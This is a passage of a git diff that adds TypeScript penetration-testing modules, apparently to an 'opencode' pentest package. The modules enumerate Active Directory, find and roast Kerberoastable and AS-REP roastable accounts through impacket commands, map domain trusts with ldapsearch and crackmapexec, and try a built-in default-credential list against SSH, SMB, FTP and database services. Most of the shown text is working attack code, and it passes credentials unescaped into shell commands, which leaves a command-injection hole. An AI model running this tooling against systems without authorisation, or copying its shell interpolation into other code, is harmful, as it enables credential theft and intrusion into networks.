+    auth: { username: string; password: string; domain: string },
+    options: { timeout?: number; ssl?: boolean } = {}
+  ): Promise<NetScanTypes.ADUser[]> {
+    const baseDN = auth.domain.split(".").map((p) => `DC=${p}`).join(",")
+
+    log.info("Finding AS-REP roastable accounts", { dc, domain: auth.domain })
+
+    const users = await LDAPEnum.findASRepRoastable(dc, {
+      baseDN,
+      auth: { username: auth.username, password: auth.password, domain: auth.domain },
+      ssl: options.ssl,
+      timeout: options.timeout,
+    })
+
+    log.info("AS-REP roastable search complete", { count: users.length })
+
+    return users
+  }
+
+  /**
+   * Full AD enumeration.
+   */
+  export async function enumerate(
+    options: ADEnumOptions
+  ): Promise<ADEnumResult> {
+    const auth = { ...options.auth, domain: options.domain }
+
+    log.info("Starting full AD enumeration", { dc: options.dc, domain: options.domain })
+
+    const result: ADEnumResult = {
+      domain: {
+        name: options.domain,
+        netbios: options.domain.split(".")[0].toUpperCase(),
+        domainSID: "",
+        functionalLevel: "unknown",
+        domainControllers: [],
+        trusts: [],
+      },
+      users: [],
+      groups: [],
+      computers: [],
+      findings: [],
+    }
+
+    // Get domain info
+    try {
+      result.domain = await getDomainInfo(options.dc, auth, {
+        timeout: options.timeout,
+        ssl: options.ssl,
+      })
+      result.findings.push(`Domain: ${result.domain.name}`)
+      result.findings.push(`Domain Controllers: ${result.domain.domainControllers.length}`)
+    } catch (err) {
+      result.findings.push(`Failed to get domain info: ${String(err)}`)
+    }
+
+    // Get users
+    try {
+      result.users = await getUsers(options.dc, auth, {
+        timeout: options.timeout,
+        ssl: options.ssl,
+      })
+      result.findings.push(`Users enumerated: ${result.users.length}`)
+
+      // Analyze users
+      const enabled = result.users.filter((u) => u.enabled).length
+      const kerberoastable = result.users.filter((u) => u.servicePrincipalNames.length > 0)
+      const asrepRoastable = result.users.filter((u) => u.dontRequirePreauth)
+      const admins = result.users.filter((u) => u.adminCount)
+
+      result.findings.push(`  Enabled: ${enabled}`)
+      if (kerberoastable.length > 0) {
+        result.findings.push(`  Kerberoastable: ${kerberoastable.length}`)
+      }
+      if (asrepRoastable.length > 0) {
+        result.findings.push(`  AS-REP Roastable: ${asrepRoastable.length}`)
+      }
+      if (admins.length > 0) {
+        result.findings.push(`  Admin accounts: ${admins.length}`)
+      }
+    } catch (err) {
+      result.findings.push(`Failed to enumerate users: ${String(err)}`)
+    }
+
+    // Get groups
+    try {
+      result.groups = await getGroups(options.dc, auth, {
+        timeout: options.timeout,
+        ssl: options.ssl,
+      })
+      result.findings.push(`Groups enumerated: ${result.groups.length}`)
+
+      const privileged = result.groups.filter((g) => g.isPrivileged)
+      if (privileged.length > 0) {
+        result.findings.push(`  Privileged groups: ${privileged.length}`)
+      }
+    } catch (err) {
+      result.findings.push(`Failed to enumerate groups: ${String(err)}`)
+    }
+
+    // Get computers
+    try {
+      result.computers = await getComputers(options.dc, auth, {
+        timeout: options.timeout,
+        ssl: options.ssl,
+      })
+      result.findings.push(`Computers enumerated: ${result.computers.length}`)
+
+      const dcs = result.computers.filter((c) => c.isDomainController)
+      if (dcs.length > 0) {
+        result.findings.push(`  Domain Controllers: ${dcs.length}`)
+      }
+    } catch (err) {
+      result.findings.push(`Failed to enumerate computers: ${String(err)}`)
+    }
+
+    log.info("AD enumeration complete", {
+      users: result.users.length,
+      groups: result.groups.length,
+      computers: result.computers.length,
+    })
+
+    return result
+  }
+
+  /**
+   * Format enumeration results for display.
+   */
+  export function formatResults(result: ADEnumResult): string {
+    const lines: string[] = []
+
+    lines.push(`Active Directory Enumeration: ${result.domain.name}`)
+    lines.push("")
+    lines.push("Domain Information:")
+    lines.push(`  Name: ${result.domain.name}`)
+    lines.push(`  NetBIOS: ${result.domain.netbios}`)
+    lines.push(`  Functional Level: ${result.domain.functionalLevel}`)
+    lines.push(`  Domain Controllers: ${result.domain.domainControllers.join(", ")}`)
+    lines.push("")
+    lines.push(`Users: ${result.users.length}`)
+    lines.push(`Groups: ${result.groups.length}`)
+    lines.push(`Computers: ${result.computers.length}`)
+    lines.push("")
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/ad/index.ts b/packages/opencode/src/pentest/netscan/ad/index.ts
new file mode 100644
index 00000000000..058e29d238c
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/ad/index.ts
@@ -0,0 +1,21 @@
+/**
+ * @fileoverview AD Module Exports
+ *
+ * Export all Active Directory testing functionality.
+ *
+ * @module pentest/netscan/ad
+ */
+
+export { ADEnumeration } from "./enumeration"
+export type { ADEnumOptions, ADEnumResult } from "./enumeration"
+
+export { Kerberos } from "./kerberos"
+export type {
+  KerberosOptions,
+  KerberoastTarget,
+  ASRepTarget,
+  KerberosResult,
+} from "./kerberos"
+
+export { DomainTrusts } from "./trusts"
+export type { TrustEnumOptions, TrustEnumResult } from "./trusts"
diff --git a/packages/opencode/src/pentest/netscan/ad/kerberos.ts b/packages/opencode/src/pentest/netscan/ad/kerberos.ts
new file mode 100644
index 00000000000..1c54ebe847b
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/ad/kerberos.ts
@@ -0,0 +1,277 @@
+/**
+ * @fileoverview Kerberos Attack Detection
+ *
+ * Identify Kerberoasting and AS-REP roasting targets.
+ *
+ * @module pentest/netscan/ad/kerberos
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { NetScanTypes } from "../types"
+import { ADEnumeration } from "./enumeration"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.ad.kerberos" })
+
+/**
+ * Kerberos options.
+ */
+export interface KerberosOptions {
+  dc: string
+  domain: string
+  auth: {
+    username: string
+    password: string
+  }
+  timeout?: number
+}
+
+/**
+ * Kerberoast target.
+ */
+export interface KerberoastTarget {
+  samAccountName: string
+  distinguishedName: string
+  servicePrincipalNames: string[]
+  isAdmin: boolean
+  lastLogon?: number
+  pwdLastSet?: number
+}
+
+/**
+ * AS-REP roast target.
+ */
+export interface ASRepTarget {
+  samAccountName: string
+  distinguishedName: string
+  isAdmin: boolean
+  lastLogon?: number
+}
+
+/**
+ * Kerberos attack result.
+ */
+export interface KerberosResult {
+  kerberoastTargets: KerberoastTarget[]
+  asrepTargets: ASRepTarget[]
+  findings: string[]
+}
+
+/**
+ * Kerberos namespace.
+ */
+export namespace Kerberos {
+  /**
+   * Find all Kerberos attack targets.
+   */
+  export async function findTargets(options: KerberosOptions): Promise<KerberosResult> {
+    const auth = { ...options.auth, domain: options.domain }
+
+    log.info("Finding Kerberos attack targets", { dc: options.dc, domain: options.domain })
+
+    const result: KerberosResult = {
+      kerberoastTargets: [],
+      asrepTargets: [],
+      findings: [],
+    }
+
+    // Find Kerberoastable users
+    try {
+      const kerberoastable = await ADEnumeration.getKerberoastable(options.dc, auth, {
+        timeout: options.timeout,
+      })
+
+      result.kerberoastTargets = kerberoastable.map((u) => ({
+        samAccountName: u.samAccountName,
+        distinguishedName: u.distinguishedName,
+        servicePrincipalNames: u.servicePrincipalNames,
+        isAdmin: u.adminCount,
+        lastLogon: u.lastLogon,
+        pwdLastSet: u.passwordLastSet,
+      }))
+
+      if (result.kerberoastTargets.length > 0) {
+        result.findings.push(`Found ${result.kerberoastTargets.length} Kerberoastable accounts`)
+
+        const admins = result.kerberoastTargets.filter((t) => t.isAdmin)
+        if (admins.length > 0) {
+          result.findings.push(`  ${admins.length} are privileged accounts!`)
+          for (const admin of admins) {
+            result.findings.push(`    - ${admin.samAccountName}`)
+          }
+        }
+
+        // Check for weak SPNs
+        for (const target of result.kerberoastTargets) {
+          for (const spn of target.servicePrincipalNames) {
+            if (spn.toLowerCase().includes("mssql") || spn.toLowerCase().includes("http")) {
+              result.findings.push(
+                `  ${target.samAccountName} has ${spn} SPN (common service)`
+              )
+            }
+          }
+        }
+      }
+    } catch (err) {
+      result.findings.push(`Failed to find Kerberoastable accounts: ${String(err)}`)
+    }
+
+    // Find AS-REP roastable users
+    try {
+      const asrepRoastable = await ADEnumeration.getASRepRoastable(options.dc, auth, {
+        timeout: options.timeout,
+      })
+
+      result.asrepTargets = asrepRoastable.map((u) => ({
+        samAccountName: u.samAccountName,
+        distinguishedName: u.distinguishedName,
+        isAdmin: u.adminCount,
+        lastLogon: u.lastLogon,
+      }))
+
+      if (result.asrepTargets.length > 0) {
+        result.findings.push(`Found ${result.asrepTargets.length} AS-REP roastable accounts`)
+
+        const admins = result.asrepTargets.filter((t) => t.isAdmin)
+        if (admins.length > 0) {
+          result.findings.push(`  ${admins.length} are privileged accounts!`)
+          for (const admin of admins) {
+            result.findings.push(`    - ${admin.samAccountName}`)
+          }
+        }
+      }
+    } catch (err) {
+      result.findings.push(`Failed to find AS-REP roastable accounts: ${String(err)}`)
+    }
+
+    log.info("Kerberos target search complete", {
+      kerberoastable: result.kerberoastTargets.length,
+      asrepRoastable: result.asrepTargets.length,
+    })
+
+    return result
+  }
+
+  /**
+   * Request TGS tickets for Kerberoasting (requires impacket).
+   */
+  export async function requestTGS(
+    options: KerberosOptions,
+    outputFile?: string
+  ): Promise<{ success: boolean; ticketCount: number; outputFile?: string }> {
+    log.info("Requesting TGS tickets for Kerberoasting", { dc: options.dc })
+
+    const output = outputFile || `/tmp/kerberoast_${Date.now()}.txt`
+
+    try {
+      const { stdout, stderr } = await execAsync(
+        `impacket-GetUserSPNs -request -dc-ip ${options.dc} '${options.domain}/${options.auth.username}:${options.auth.password}' -outputfile '${output}' 2>&1`,
+        { timeout: options.timeout || 120000 }
+      )
+
+      const allOutput = stdout + stderr
+
+      // Count tickets
+      const ticketMatch = allOutput.match(/(\d+)\s+ticket/i)
+      const ticketCount = ticketMatch ? parseInt(ticketMatch[1], 10) : 0
+
+      if (ticketCount > 0 || allOutput.includes("$krb5tgs$")) {
+        return { success: true, ticketCount, outputFile: output }
+      }
+
+      return { success: false, ticketCount: 0 }
+    } catch (err) {
+      log.debug("TGS request failed", { error: String(err) })
+      return { success: false, ticketCount: 0 }
+    }
+  }
+
+  /**
+   * Request AS-REP hashes (requires impacket).
+   */
+  export async function requestASRep(
+    options: KerberosOptions,
+    targetUsers: string[],
+    outputFile?: string
+  ): Promise<{ success: boolean; hashCount: number; outputFile?: string }> {
+    log.info("Requesting AS-REP hashes", { dc: options.dc, targets: targetUsers.length })
+
+    const output = outputFile || `/tmp/asrep_${Date.now()}.txt`
+    const userFile = `/tmp/asrep_users_${Date.now()}.txt`
+
+    try {
+      // Write users to file
+      await execAsync(`echo '${targetUsers.join("\n")}' > '${userFile}'`)
+
+      const { stdout, stderr } = await execAsync(
+        `impacket-GetNPUsers -usersfile '${userFile}' -request -dc-ip ${options.dc} '${options.domain}/' -outputfile '${output}' 2>&1`,
+        { timeout: options.timeout || 120000 }
+      )
+
+      const allOutput = stdout + stderr
+
+      // Count hashes
+      const hashMatches = allOutput.match(/\$krb5asrep\$/g)
+      const hashCount = hashMatches ? hashMatches.length : 0
+
+      // Clean up user file
+      await execAsync(`rm -f '${userFile}'`).catch(() => {})
+
+      if (hashCount > 0) {
+        return { success: true, hashCount, outputFile: output }
+      }
+
+      return { success: false, hashCount: 0 }
+    } catch (err) {
+      log.debug("AS-REP request failed", { error: String(err) })
+      return { success: false, hashCount: 0 }
+    }
+  }
+
+  /**
+   * Format Kerberos results for display.
+   */
+  export function formatResults(result: KerberosResult): string {
+    const lines: string[] = []
+
+    lines.push("Kerberos Attack Target Analysis")
+    lines.push("")
+
+    if (result.kerberoastTargets.length > 0) {
+      lines.push(`Kerberoastable Accounts (${result.kerberoastTargets.length}):`)
+      lines.push("| Username | SPNs | Admin | Password Age |")
+      lines.push("|----------|------|-------|--------------|")
+
+      for (const target of result.kerberoastTargets) {
+        const pwdAge = target.pwdLastSet
+          ? Math.floor((Date.now() - target.pwdLastSet) / (1000 * 60 * 60 * 24)) + " days"
+          : "Unknown"
+        lines.push(
+          `| ${target.samAccountName} | ${target.servicePrincipalNames.length} | ${target.isAdmin ? "Yes" : "No"} | ${pwdAge} |`
+        )
+      }
+
+      lines.push("")
+    }
+
+    if (result.asrepTargets.length > 0) {
+      lines.push(`AS-REP Roastable Accounts (${result.asrepTargets.length}):`)
+      lines.push("| Username | Admin |")
+      lines.push("|----------|-------|")
+
+      for (const target of result.asrepTargets) {
+        lines.push(`| ${target.samAccountName} | ${target.isAdmin ? "Yes" : "No"} |`)
+      }
+
+      lines.push("")
+    }
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/ad/trusts.ts b/packages/opencode/src/pentest/netscan/ad/trusts.ts
new file mode 100644
index 00000000000..4f329c4fd22
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/ad/trusts.ts
@@ -0,0 +1,298 @@
+/**
+ * @fileoverview Domain Trust Enumeration
+ *
+ * Enumerate and analyze AD domain trusts.
+ *
+ * @module pentest/netscan/ad/trusts
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { NetScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.ad.trusts" })
+
+/**
+ * Trust enumeration options.
+ */
+export interface TrustEnumOptions {
+  dc: string
+  domain: string
+  auth: {
+    username: string
+    password: string
+  }
+  timeout?: number
+}
+
+/**
+ * Trust enumeration result.
+ */
+export interface TrustEnumResult {
+  trusts: NetScanTypes.DomainTrust[]
+  findings: string[]
+}
+
+/**
+ * Domain trusts namespace.
+ */
+export namespace DomainTrusts {
+  /**
+   * Enumerate domain trusts.
+   */
+  export async function enumerate(options: TrustEnumOptions): Promise<TrustEnumResult> {
+    const timeout = options.timeout || 60000
+
+    log.info("Enumerating domain trusts", { dc: options.dc, domain: options.domain })
+
+    const result: TrustEnumResult = {
+      trusts: [],
+      findings: [],
+    }
+
+    // Try LDAP enumeration of trusts
+    try {
+      const ldapTrusts = await enumerateViaLDAP(options)
+      result.trusts.push(...ldapTrusts)
+    } catch (err) {
+      log.debug("LDAP trust enumeration failed", { error: String(err) })
+    }
+
+    // Try netexec/crackmapexec for additional info
+    if (result.trusts.length === 0) {
+      try {
+        const cmeTrusts = await enumerateViaCME(options)
+        result.trusts.push(...cmeTrusts)
+      } catch (err) {
+        log.debug("CME trust enumeration failed", { error: String(err) })
+      }
+    }
+
+    // Analyze trusts
+    for (const trust of result.trusts) {
+      result.findings.push(
+        `Trust: ${trust.targetDomain} (${trust.trustType}, ${trust.trustDirection})`
+      )
+
+      // Check for exploitable trust configurations
+      if (!trust.sidFiltering) {
+        result.findings.push(
+          `  [CRITICAL] SID filtering disabled on trust to ${trust.targetDomain} - potential for SID history attacks`
+        )
+      }
+
+      if (trust.trustDirection === "bidirectional" && trust.trustType === "forest") {
+        result.findings.push(
+          `  [HIGH] Bidirectional forest trust to ${trust.targetDomain} - full access between forests`
+        )
+      }
+
+      if (trust.isTransitive) {
+        result.findings.push(
+          `  [INFO] Transitive trust - can potentially access resources in trusted domains`
+        )
+      }
+    }
+
+    log.info("Trust enumeration complete", { trustCount: result.trusts.length })
+
+    return result
+  }
+
+  /**
+   * Enumerate trusts via LDAP.
+   */
+  async function enumerateViaLDAP(options: TrustEnumOptions): Promise<NetScanTypes.DomainTrust[]> {
+    const trusts: NetScanTypes.DomainTrust[] = []
+    const baseDN = options.domain.split(".").map((p) => `DC=${p}`).join(",")
+    const trustDN = `CN=System,${baseDN}`
+
+    const bindDN = `${options.auth.username}@${options.domain}`
+
+    const { stdout } = await execAsync(
+      `ldapsearch -x -H 'ldap://${options.dc}' -D '${bindDN}' -w '${options.auth.password}' -b '${trustDN}' '(objectClass=trustedDomain)' cn trustDirection trustType trustAttributes flatName securityIdentifier 2>&1`,
+      { timeout: options.timeout || 60000 }
+    )
+
+    // Parse LDAP output
+    const entries = stdout.split(/\n\n+/)
+
+    for (const entry of entries) {
+      if (!entry.includes("trustedDomain")) continue
+
+      const cnMatch = entry.match(/cn:\s*(.+)/i)
+      const directionMatch = entry.match(/trustDirection:\s*(\d+)/i)
+      const typeMatch = entry.match(/trustType:\s*(\d+)/i)
+      const attrsMatch = entry.match(/trustAttributes:\s*(\d+)/i)
+      const flatNameMatch = entry.match(/flatName:\s*(.+)/i)
+
+      if (!cnMatch) continue
+
+      const direction = parseInt(directionMatch?.[1] || "0", 10)
+      const type = parseInt(typeMatch?.[1] || "0", 10)
+      const attrs = parseInt(attrsMatch?.[1] || "0", 10)
+
+      const trustTypeValue = getTrustType(type)
+      const trustDirectionValue = getTrustDirection(direction)
+      trusts.push({
+        targetDomain: cnMatch[1].trim(),
+        direction: trustDirectionValue,
+        type: trustTypeValue,
+        trustType: trustTypeValue,
+        trustDirection: trustDirectionValue,
+        transitive: (attrs & 0x1) !== 0,
+        isTransitive: (attrs & 0x1) !== 0,
+        sidFiltering: (attrs & 0x4) === 0, // TRUST_ATTRIBUTE_QUARANTINED_DOMAIN
+        tgtDelegation: (attrs & 0x200) !== 0,
+      })
+    }
+
+    return trusts
+  }
+
+  /**
+   * Enumerate trusts via CrackMapExec.
+   */
+  async function enumerateViaCME(options: TrustEnumOptions): Promise<NetScanTypes.DomainTrust[]> {
+    const trusts: NetScanTypes.DomainTrust[] = []
+
+    try {
+      const { stdout } = await execAsync(
+        `crackmapexec smb ${options.dc} -u '${options.auth.username}' -p '${options.auth.password}' -d '${options.domain}' --trusted-for-delegation 2>&1`,
+        { timeout: options.timeout || 30000 }
+      )
+
+      // Parse CME output for trust info
+      // This is a simplified parser - actual CME output format may vary
+      const lines = stdout.split("\n")
+      for (const line of lines) {
+        if (line.includes("trust") && line.includes("->")) {
+          const match = line.match(/(\S+)\s+->\s+(\S+)/i)
+          if (match) {
+            trusts.push({
+              targetDomain: match[2],
+              direction: "outbound",
+              type: "external",
+              trustType: "external",
+              trustDirection: "outbound",
+              transitive: false,
+              isTransitive: false,
+              sidFiltering: true,
+              tgtDelegation: false,
+            })
+          }
+        }
+      }
+    } catch {
+      // CME not available
+    }
+
+    return trusts
+  }
+
+  /**
+   * Get trust type string.
+   */
+  function getTrustType(type: number): NetScanTypes.TrustType {
+    switch (type) {
+      case 1:
+        return "parent-child"
+      case 2:
+        return "shortcut"
+      case 3:
+        return "forest"
+      case 4:
+        return "external"
+      default:
+        return "unknown"
+    }
+  }
+
+  /**
+   * Get trust direction string.
+   */
+  function getTrustDirection(direction: number): NetScanTypes.TrustDirection {
+    switch (direction) {
+      case 1:
+        return "inbound"
+      case 2:
+        return "outbound"
+      case 3:
+        return "bidirectional"
+      default:
+        return "unknown"
+    }
+  }
+
+  /**
+   * Check for exploitable trust configurations.
+   */
+  export function analyzeSecurityRisks(trusts: NetScanTypes.DomainTrust[]): string[] {
+    const risks: string[] = []
+
+    for (const trust of trusts) {
+      // No SID filtering
+      if (!trust.sidFiltering) {
+        risks.push(
+          `[CRITICAL] Trust to ${trust.targetDomain} has SID filtering disabled - SID history attacks possible`
+        )
+      }
+
+      // TGT delegation
+      if (trust.tgtDelegation) {
+        risks.push(
+          `[HIGH] Trust to ${trust.targetDomain} allows TGT delegation - ticket forwarding possible`
+        )
+      }
+
+      // Bidirectional forest trust
+      if (trust.trustType === "forest" && trust.trustDirection === "bidirectional") {
+        risks.push(
+          `[HIGH] Bidirectional forest trust with ${trust.targetDomain} - compromising one forest compromises both`
+        )
+      }
+
+      // External trust without SID filtering
+      if (trust.trustType === "external" && !trust.sidFiltering) {
+        risks.push(
+          `[CRITICAL] External trust to ${trust.targetDomain} without SID filtering - high risk`
+        )
+      }
+    }
+
+    return risks
+  }
+
+  /**
+   * Format trust results for display.
+   */
+  export function formatResults(result: TrustEnumResult): string {
+    const lines: string[] = []
+
+    lines.push("Domain Trust Analysis")
+    lines.push("")
+
+    if (result.trusts.length === 0) {
+      lines.push("No domain trusts found")
+    } else {
+      lines.push("| Target Domain | Type | Direction | SID Filter | TGT Deleg |")
+      lines.push("|---------------|------|-----------|------------|-----------|")
+
+      for (const trust of result.trusts) {
+        lines.push(
+          `| ${trust.targetDomain} | ${trust.trustType} | ${trust.trustDirection} | ${trust.sidFiltering ? "Yes" : "NO"} | ${trust.tgtDelegation ? "Yes" : "No"} |`
+        )
+      }
+
+      lines.push("")
+    }
+
+    for (const finding of result.findings) {
+      lines.push(`[!] ${finding}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/netscan/creds/defaults.ts b/packages/opencode/src/pentest/netscan/creds/defaults.ts
new file mode 100644
index 00000000000..9fcdf2015d6
--- /dev/null
+++ b/packages/opencode/src/pentest/netscan/creds/defaults.ts
@@ -0,0 +1,419 @@
+/**
+ * @fileoverview Default Credential Database
+ *
+ * Test common default credentials against services.
+ *
+ * @module pentest/netscan/creds/defaults
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { NetScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "netscan.creds.defaults" })
+
+/**
+ * Default credential.
+ */
+export interface DefaultCredential {
+  username: string
+  password: string
+  description?: string
+}
+
+/**
+ * Test options.
+ */
+export interface DefaultTestOptions {
+  timeout?: number
+  stopOnFirst?: boolean
+}
+
+/**
+ * Default credentials database.
+ */
+export const DEFAULT_CREDENTIALS: Record<string, DefaultCredential[]> = {
+  ssh: [
+    { username: "root", password: "root" },
+    { username: "root", password: "toor" },
+    { username: "root", password: "password" },
+    { username: "admin", password: "admin" },
+    { username: "admin", password: "password" },
+    { username: "administrator", password: "administrator" },
+    { username: "user", password: "user" },
+    { username: "guest", password: "guest" },
+    { username: "ubuntu", password: "ubuntu" },
+    { username: "pi", password: "raspberry" },
+  ],
+  smb: [
+    { username: "administrator", password: "password" },
+    { username: "administrator", password: "" },
+    { username: "admin", password: "admin" },
+    { username: "guest", password: "" },
+    { username: "user", password: "user" },
+  ],
+  ftp: [
+    { username: "anonymous", password: "" },
+    { username: "anonymous", password: "anonymous" },
+    { username: "ftp", password: "ftp" },
+    { username: "admin", password: "admin" },
+    { username: "root", password: "root" },
+  ],
+  telnet: [
+    { username: "admin", password: "admin" },
+    { username: "root", password: "root" },
+    { username: "root", password: "" },
+    { username: "user", password: "user" },
+  ],
+  mysql: [
+    { username: "root", password: "" },
+    { username: "root", password: "root" },
+    { username: "root", password: "mysql" },
+    { username: "root", password: "password" },
+    { username: "mysql", password: "mysql" },
+  ],
+  mssql: [
+    { username: "sa", password: "" },
+    { username: "sa", password: "sa" },
+    { username: "sa", password: "password" },
+    { username: "sa", password: "Password123" },
+  ],
+  postgres: [
+    { username: "postgres", password: "postgres" },
+    { username: "postgres", password: "" },
+    { username: "postgres", password: "password" },
+  ],
+  vnc: [
+    { username: "", password: "" },
+    { username: "", password: "password" },
+    { username: "", password: "vnc" },
+    { username: "", password: "1234" },
+  ],
+  rdp: [
+    { username: "administrator", password: "password" },
+    { username: "admin", password: "admin" },
+    { username: "user", password: "user" },
+  ],
+  snmp: [
+    { username: "", password: "public", description: "Read-only community" },
+    { username: "", password: "private", description: "Read-write community" },
+    { username: "", password: "community" },
+  ],
+  ldap: [
+    { username: "admin", password: "admin" },
+    { username: "administrator", password: "password" },
+    { username: "cn=admin", password: "admin" },
+  ],
+  http: [
+    { username: "admin", password: "admin" },
+    { username: "admin", password: "password" },
+    { username: "admin", password: "" },
+    { username: "root", password: "root" },
+    { username: "user", password: "user" },
+  ],
+  tomcat: [
+    { username: "admin", password: "admin" },
+    { username: "tomcat", password: "tomcat" },
+    { username: "manager", password: "manager" },
+    { username: "admin", password: "password" },
+  ],
+  jenkins: [
+    { username: "admin", password: "admin" },
+    { username: "admin", password: "password" },
+    { username: "jenkins", password: "jenkins" },
+  ],
+}
+
+/**
+ * Default credentials namespace.
+ */
+export namespace DefaultCreds {
+  /**
+   * Get default credentials for a service.
+   */
+  export function getForService(service: string): DefaultCredential[] {
+    const normalized = service.toLowerCase()
+    return DEFAULT_CREDENTIALS[normalized] || []
+  }
+
+  /**
+   * Test default credentials against a service.
+   */
+  export async function test(
+    host: string,
+    service: string,
+    port: number,
+    options: DefaultTestOptions = {}
+  ): Promise<NetScanTypes.CredentialResult[]> {
+    const creds = getForService(service)
+    const results: NetScanTypes.CredentialResult[] = []
+    const timeout = options.timeout || 30000
+
+    log.info("Testing default credentials", { host, service, port, credCount: creds.length })
+
+    for (const cred of creds) {
+      try {
+        const valid = await testCredential(host, service, port, cred, timeout)
+
+        if (valid) {
+          const result: NetScanTypes.CredentialResult = {
+            id: `cred_default_${Date.now()}_${Math.random().toString(36).slice(2)}`,
+            host,
+            service: service as NetScanTypes.ServiceType,
+            port,
+            username: cred.username,
+            password: cred.password,
+            method: "default",
+            valid: true,
+            admin: await checkAdmin(host, service, port, cred, timeout),
+            timestamp: Date.now(),
+          }
+
+          results.push(result)
+          log.info("Valid credential found", {
+            host,
+            service,
+            username: cred.username,
+          })
+
+          if (options.stopOnFirst) {
+            break
+          }
+        }
+      } catch (err) {
+        log.debug("Credential test failed", {
+          host,
+          service,
+          username: cred.username,
+          error: String(err),
+        })
+      }
+    }
+
+    log.info("Default credential test complete", {
+      host,
+      service,
+      testedCount: creds.length,
+      validCount: results.length,
+    })
+
+    return results
+  }
+
+  /**
+   * Test a single credential.
+   */
+  async function testCredential(
+    host: string,
+    service: string,
+    port: number,
+    cred: DefaultCredential,
+    timeout: number
+  ): Promise<boolean> {
+    switch (service.toLowerCase()) {
+      case "ssh":
+        return testSSH(host, port, cred, timeout)
+      case "smb":
+        return testSMB(host, port, cred, timeout)
+      case "ftp":
+        return testFTP(host, port, cred, timeout)
+      case "mysql":
+        return testMySQL(host, port, cred, timeout)
+      case "mssql":
+        return testMSSQL(host, port, cred, timeout)
+      case "postgres":
+        return testPostgres(host, port, cred, timeout)
+      case "rdp":
+        return testRDP(host, port, cred, timeout)
+      default:
+        return false
+    }
+  }
+
+  /**
+   * Test SSH credentials.
+   */
+  async function testSSH(
+    host: string,
+    port: number,
+    cred: DefaultCredential,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const { stdout, stderr } = await execAsync(
+        `sshpass -p '${cred.password}' ssh -o StrictHostKeyChecking=no -o ConnectTimeout=5 -p ${port} '${cred.username}@${host}' 'echo success' 2>&1`,
+        { timeout }
+      )
+      return (stdout + stderr).includes("success")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Test SMB credentials.
+   */
+  async function testSMB(
+    host: string,
+    port: number,
+    cred: DefaultCredential,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const { stdout, stderr } = await execAsync(
+        `smbclient -L //${host} -U '${cred.username}%${cred.password}' 2>&1`,
+        { timeout }
+      )
+      const output = stdout + stderr
+      return !output.includes("NT_STATUS_LOGON_FAILURE") && !output.includes("NT_STATUS_ACCESS_DENIED")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Test FTP credentials.
+   */
+  async function testFTP(
+    host: string,
+    port: number,
+    cred: DefaultCredential,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const { stdout, stderr } = await execAsync(
+        `curl -s -m 5 --user '${cred.username}:${cred.password}' ftp://${host}:${port}/ 2>&1`,
+        { timeout }
+      )
+      const output = stdout + stderr
+      return !output.includes("Login incorrect") && !output.includes("530")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Test MySQL credentials.
+   */
+  async function testMySQL(
+    host: string,
+    port: number,
+    cred: DefaultCredential,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const { stdout, stderr } = await execAsync(
+        `mysql -h '${host}' -P ${port} -u '${cred.username}' -p'${cred.password}' -e 'SELECT 1' 2>&1`,
+        { timeout }
+      )
+      return (stdout + stderr).includes("1")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Test MSSQL credentials.
+   */
+  async function testMSSQL(
+    host: string,
+    port: number,
+    cred: DefaultCredential,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const { stdout, stderr } = await execAsync(
+        `sqlcmd -S '${host},${port}' -U '${cred.username}' -P '${cred.password}' -Q 'SELECT 1' 2>&1`,
+        { timeout }
+      )
+      return (stdout + stderr).includes("1")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Test PostgreSQL credentials.
+   */
+  async function testPostgres(
+    host: string,
+    port: number,
+    cred: DefaultCredential,
+    timeout: number
+  ): Promise<boolean> {
+    try {
+      const { stdout, stderr } = await execAsync(
+        `PGPASSWORD='${cred.password}' psql -h '${host}' -p ${port} -U '${cred.username}' -c 'SELECT 1' 2>&1`,
+        { timeout }
+      )
+      return (stdout + stderr).includes("1")
+    } catch {
+      return false
+    }
+  }
+
+  /**
+   * Test RDP credentials.
+   */
+  async function testRDP(
+    host: string,
+    port: number,
+    cred: DefaultCredential,
+    timeout: number
+  ): Promise<boolean> {
+    // RDP testing requires specialized tools
+    // This is a placeholder - real implementation would use xfreerdp or similar
+    return false
+  }
+
+  /**
+   * Check if credential has admin access.
+   */
+  async function checkAdmin(
+    host: string,
+    service: string,
+    port: number,
+    cred: DefaultCredential,
+    timeout: number
+  ): Promise<boolean> {
+    switch (service.toLowerCase()) {
+      case "smb":
+        try {
+          const { stdout } = await execAsync(
+            `crackmapexec smb ${host} -u '${cred.username}' -p '${cred.password}' 2>&1`,
+            { timeout }
+          )
+          return stdout.includes("Pwn3d!")
+        } catch {
+          return false
+        }
+      case "mysql":
+      case "mssql":
+      case "postgres":
+        // For databases, check for specific admin rights
+        return cred.username.toLowerCase() === "root" || cred.username.toLowerCase() === "sa"
+      default:
+        return cred.username.toLowerCase() === "root" || cred.username.toLowerCase() === "administrator"
+    }
+  }
+
+  /**
+   * Get all supported services.
+   */
+  export function getSupportedServices(): string[] {
